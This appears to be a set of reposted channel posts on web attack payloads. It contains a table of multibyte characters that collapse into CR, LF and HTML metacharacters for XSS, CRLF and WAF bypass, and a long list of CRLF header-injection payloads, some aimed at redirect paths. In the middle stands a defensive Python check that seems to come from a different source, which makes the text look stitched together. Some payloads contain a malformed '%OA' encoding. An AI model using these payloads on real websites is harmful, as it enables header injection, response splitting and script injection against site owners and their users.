GBK Encoding / MultiByte Attack
嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (")
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (')
For XSS, CRLF, WAF bypass
#bypass #xss #crlf
——————
0Day.Today
@LearnExploit
@Tech_Army
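A defensive check for the mapping above, added here as an example (not code from the channel): it flags characters that become CR, LF, <, > or a quote when a downstream component keeps only the low byte of each code point, and it generalizes to nested percent-encoding. The function names and the decode-round limit are assumptions.

```python
from urllib.parse import unquote

# Low-byte values that end a header line or break out of HTML/attribute context.
DANGEROUS = {0x0A: "LF", 0x0D: "CR", 0x3C: "<", 0x3E: ">", 0x22: '"', 0x27: "'"}
MAX_DECODE_ROUNDS = 5  # assumption: upper bound on nested percent-encoding


def fully_decode(value: str) -> str:
    """Percent-decode repeatedly until the string stops changing."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value, encoding="utf-8", errors="replace")
        if decoded == value:
            break
        value = decoded
    return value


def find_hidden_metachars(raw: str) -> list[tuple[int, str, str]]:
    """Return (index, code point, resulting metachar) for each risky character.

    A character is risky if it is a dangerous ASCII character itself, or if
    truncating its code point to 8 bits yields one (U+560A -> 0x0A, ...).
    """
    findings = []
    for i, ch in enumerate(fully_decode(raw)):
        cp = ord(ch)
        low = cp & 0xFF  # what a byte-truncating component would emit
        if low in DANGEROUS:
            findings.append((i, f"U+{cp:04X}", DANGEROUS[low]))
    return findings


def is_safe_header_value(raw: str) -> bool:
    """True only if no character is, or can collapse into, CR or LF."""
    return all(kind not in ("CR", "LF") for _, _, kind in find_hidden_metachars(raw))


if __name__ == "__main__":
    # Constructed sample inputs, not captured traffic.
    for sample in ("%E5%98%8A%E5%98%8DX-Test:1", "%250AX-Test:1", "en-US"):
        print(sample, is_safe_header_value(sample), find_hidden_metachars(sample))
```

The low-byte test is deliberately conservative, so legitimate text containing a character such as 嘊 is also flagged; apply it only to values that flow into response headers or unescaped markup.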
CRLF Injection Payloads
%0AHeader-Test:Bug
%0A%20Header-Test:Bug
%20%0AHeader-Test:Bug
%23%OAHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0AHeader-Test:Bug
%3F%0AHeader-Test:Bug
crlf%0AHeader-Test:Bug
crlf%0A%20Header-Test:Bug
crlf%20%0AHeader-Test:Bug
crlf%23%OAHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:Bug
crlf%3F%0AHeader-Test:Bug
%0DHeader-Test:Bug
%0D%20Header-Test:Bug
%20%0DHeader-Test:Bug
%23%0DHeader-Test:Bug
%23%0AHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0DHeader-Test:Bug
%3F%0DHeader-Test:Bug
crlf%0DHeader-Test:Bug
crlf%0D%20Header-Test:Bug
crlf%20%0DHeader-Test:Bug
crlf%23%0DHeader-Test:Bug
crlf%23%0AHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:Bug
crlf%3F%0DHeader-Test:Bug
%0D%0AHeader-Test:Bug
%0D%0A%20Header-Test:Bug
%20%0D%0AHeader-Test:Bug
%23%0D%0AHeader-Test:Bug
\r\nHeader-Test:Bug
\r\n Header-Test:Bug
\r\n Header-Test:Bug
%5cr%5cnHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:Bug
%3F%0D%0AHeader-Test:Bug
crlf%0D%0AHeader-Test:Bug
crlf%0D%0A%20Header-Test:Bug
crlf%20%0D%0AHeader-Test:Bug
crlf%23%0D%0AHeader-Test:Bug
crlf\r\nHeader-Test:Bug
crlf%5cr%5cnHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:Bug
crlf%3F%0D%0AHeader-Test:Bug
%0D%0A%09Header-Test:Bug
crlf%0D%0A%09Header-Test:Bug
%250AHeader-Test:Bug
%25250AHeader-Test:Bug
%%0A0AHeader-Test:Bug
%25%30AHeader-Test:Bug
%25%30%61Header-Test:Bug
%u000AHeader-Test:Bug
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:Bug
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:Bug
/google.com/%2F..%0D%0AHeader-Test:Bug
#CRLF #Payload
CRLF Injection Payload
payload :
%0D%0ASomeCustomInjectedHeader:%20injected_by_fffffff
#CRLF #Payload